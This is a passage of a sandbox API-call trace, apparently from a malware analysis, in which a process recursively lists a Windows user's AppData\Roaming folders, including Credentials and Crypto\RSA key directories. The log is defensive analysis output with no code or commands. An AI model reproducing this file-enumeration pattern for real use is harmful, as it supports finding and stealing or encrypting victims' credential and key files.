hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.408] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.409] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.409] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.409] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.409] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.409] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.409] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.409] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.409] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.409] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.409] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.409] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.409] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.409] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.409] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.409] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.409] PathMatchSpecW (pszFile="settings.sol", pszSpec="*") returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.409] PathMatchSpecW (pszFile="SJpF7mOw3gFdA.hin", pszSpec="*") returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0 [0083.409] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.409] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.409] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.409] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.410] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.410] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.410] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.410] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*" [0083.410] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.410] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.410] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Access" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access" [0083.410] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*" [0083.410] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.410] PathMatchSpecW (pszFile="AccessCache.accdb", pszSpec="*") returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.410] PathMatchSpecW (pszFile="AccessCache.laccdb", pszSpec="*") returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.410] PathMatchSpecW (pszFile="System.mdw", pszSpec="*") returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.410] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.410] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="AddIns" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns" [0083.410] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0083.410] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.410] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.410] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.410] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Bibliography" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography" [0083.410] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0083.410] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.411] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.411] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="Style" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0083.411] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0083.411] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="CHICAGO.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="GB.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="GostName.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="GostTitle.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="ISO690.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="ISO690Nmerical.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="SIST02.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.411] PathMatchSpecW (pszFile="TURABIAN.XSL", pszSpec="*") returned 1 [0083.411] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.411] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.412] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.412] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.412] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.412] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials" [0083.412] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0083.412] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.412] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.412] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.412] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.412] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.412] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto" [0083.412] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0083.412] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.412] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.412] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.412] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0083.412] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0083.412] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.412] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.413] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.413] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.413] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.413] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.413] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.413] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.413] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.413] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.413] PathMatchSpecW (pszFile="8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.413] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.413] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.414] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.414] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.414] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Document Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0083.414] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0083.414] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.414] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.414] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0083.414] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0083.414] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.414] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.414] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0083.414] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0083.414] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.414] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.414] PathMatchSpecW (pszFile="Built-In Building Blocks.dotx", pszSpec="*") returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.414] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.414] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.414] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.414] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.414] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Excel" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel" [0083.414] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*" [0083.414] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.415] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: 